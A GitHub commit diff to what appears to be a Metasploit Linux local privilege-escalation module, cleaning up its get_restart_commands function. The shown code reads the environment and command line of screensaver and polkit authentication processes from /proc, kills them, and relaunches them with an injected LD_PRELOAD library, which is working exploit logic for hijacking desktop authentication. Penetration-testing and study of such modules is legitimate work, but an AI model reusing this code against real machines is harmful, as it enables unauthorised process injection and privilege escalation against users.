Skip to content

Commit 36ac0e6

Browse files
jvazquez-r7jvazquez-r7
committed
Clean get_restart_commands
1 parent 92b3505 commit 36ac0e6

File tree

1 file changed

+20
-5
lines changed

1 file changed

+20
-5
lines changed

modules/exploits/linux/local/desktop_privilege_escalation.rb

Lines changed: 20 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -109,29 +109,44 @@ def exploit
109109
end
110110

111111
def get_restart_commands
112-
text_output = cmd_exec('pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";$/=undef;for("cmdline","environ"){open F,"</proc/$pid/$_";print "$_:".unpack("H*",<F>),"\n";}}\'').gsub("\r","")
112+
get_cmd_lines = 'pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|'
113+
get_cmd_lines << 'perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";'
114+
get_cmd_lines << 'print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";'
115+
get_cmd_lines << '$/=undef;'
116+
get_cmd_lines << 'for("cmdline","environ"){open F,"</proc/$pid/$_";print "$_:".unpack("H*",<F>),"\n";}}\''
117+
118+
text_output = cmd_exec(get_cmd_lines).gsub("\r",'')
113119
vprint_status(text_output)
120+
114121
lines = text_output.split("\n")
115-
process_restart_commands = []
122+
123+
restart_commands = []
116124
i=0
117-
while(i < lines.length-3)
125+
while i < lines.length - 3
118126
m = lines[i].match(/^PID:(\d+)/)
127+
119128
if m
120129
pid = m[1]
121130
vprint_status("PID=#{pid}")
122131
print_status("Found process: " + lines[i+1])
132+
123133
exe = lines[i+1].match(/^EXE:(\S+)$/)[1]
124134
vprint_status("exe=#{exe}")
135+
125136
cmdline = [lines[i+2].match(/^cmdline:(\w+)$/)[1]].pack("H*").split("\x00")
126137
vprint_status("CMDLINE=" + cmdline.join(" XXX "))
138+
127139
env = lines[i+3].match(/^environ:(\w+)$/)[1]
128140
restart_command = 'perl -e \'use POSIX setsid;open STDIN,"</dev/null";open STDOUT,">/dev/null";open STDERR,">/dev/null";exit if fork;setsid();kill(9,' + pid + ')||exit;%ENV=();for(split("\0",pack("H*","' + env + '"))){/([^=]+)=(.*)/;$ENV{$1}=$2}$ENV{"LD_PRELOAD"}="LD_PRELOAD_PLACEHOLDER";exec {"' + exe + '"} ' + cmdline.map{|x| '"' + x + '"'}.join(", ") + '\'';
141+
129142
vprint_status("RESTART: #{restart_command}")
130-
process_restart_commands.push(restart_command)
143+
restart_commands.push(restart_command)
131144
end
145+
132146
i+=1
133147
end
134-
return process_restart_commands
148+
149+
restart_commands
135150
end
136151

137152
def c_code(exe_file)

0 commit comments

Comments
 (0)